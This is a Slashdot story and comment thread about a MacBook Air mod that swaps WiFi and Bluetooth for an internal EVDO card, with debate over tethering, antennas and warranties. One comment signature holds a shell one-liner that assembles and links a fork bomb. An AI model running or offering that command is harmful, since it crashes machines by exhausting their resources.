Macbook Air Internal EVDO Broadband Card Mod
Sastira writes "Jordan Bunnell has successfully modded his Macbook Air to use an internal EVDO Broadband card. In order to make everything fit, he had to sacrifice the WiFi and bluetooth cards, but considering the portable nature of the laptop, it is a small price to pay for being truly wireless."
(You'll need to scroll down past the sketchy-looking top section of that page.) Sastira also links to this InsanelyMac forum thread on the mod.
Uh, my EVD0 USB dongle from Sprint is about 2.5 inches long, and weighs 2.01 ounces. I carry my MacBook around all of the time with it attached and in use. I sure wouldn't give up WiFi and Bluetooth to put it inside.
Gentoo Linux - another day, another USE flag.
Swapping a 10ft cable for a 15ft one is neither more, nor less, wired. Swapping Wi-Fi for EVDO is neither more, nor less, wireless. Lets call it truly wireless when no cords, including power cords, come in the box, or are required, ever.
So buy a replacement battery online, unscrew the 6 screws in the bottom of the laptop, and pull out the old battery, and plug in the new one.
Developers: We can use your help.
I have a Macbook Air and I solved this problem by tethering my Palm 700wx via bluetooth to my MBA. No hacking, no sacrifices (WiFi and Bluetooth still intact).
Apart from the fun of moding - why would anyone else do this?
-ted
Wifi runs at 2400 MHz, EVDO runs at 850, 1900 or about 2100 MHz, depending on carrier and implementation. So the fact that it works is fine, but I'm sure the signal isn't as good as it could be. Dell laptops have multiple antenna wires inside depending on which card you'll be using.
I wouldn't worry about the battery so much. This person clearly has the chops for opening up the case and replacing the battery, a task that only takes a screwdriver and a few minutes' time, since the battery isn't soldered in. Even if it was soldered, I doubt that'd be a problem for this guy. When he needs a replacement battery, he'll have no trouble getting an after-market one.
Yeah, at the end of the article he talked about how the performance wasn't as good as what he was getting with the card normally, especially with uploads.
IMHO, the loss of 802.11 was too much. The Air is built around the 802.11 support.
I read the internet for the articles.
In Apple's eyes, cracking open the thing just because you have the "chops" till doesn't make it ok. What if he has to have the MB replaced?
Insert funny smart-ass comment here.
Q: Why would you pay a premium for something with limited functionality, then risk destroying it to swap in a different feature, when you could have had all those features for less money?
Explaining to airport security what all the extra wires they find in the X ray are.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
If apple wanted you to have verizon access... they would have built it in. If it's not there, you don't need it.
Besides, if you want a computer that you can modify then you don't deserve to own a Macintosh.
Nothing to see here. Go back to your boring gray PC please.
Oh honey look... How cute... an angry slashdotter!
.. but when I see hack jobs like this I can applaud the user for trying but the crap workmanship is appalling. Gee, buy a decent soldering station.. Sorry, off my soapbox.
... I'll have a Pan Galactic Gargle Blaster with a side of Plutonium Nyborg
Sacrifice wi-fi? Isn't it already missing an ethernet port? Nice way to make it worthless in an office, or even a home LAN for that matter.
This may be off topic but it is funny because just a few days ago the CDMA network in Australia was shut down for good. If America wants to stay ahead in the wireless broadband race it better start upgrading its network.
No. No MiniPCI nor PCI-X. No room for the cards either. His USB EDVO was smaller than a PCI-X card, and he used a dremel to saw open more space.
Those are my principles. If you don't like them I have others. -Groucho Marx
Anyone have a solution for tethering via USB with Sprint PCS? I've been looking at the Air but so far the lack of this functionality is a showstopper.
And in a month the guy would have had a 3G iPhone he could have tethered to easily and automatically via Bluetooth. He should have waited.
I think it is time to get the macbook air. -ccdn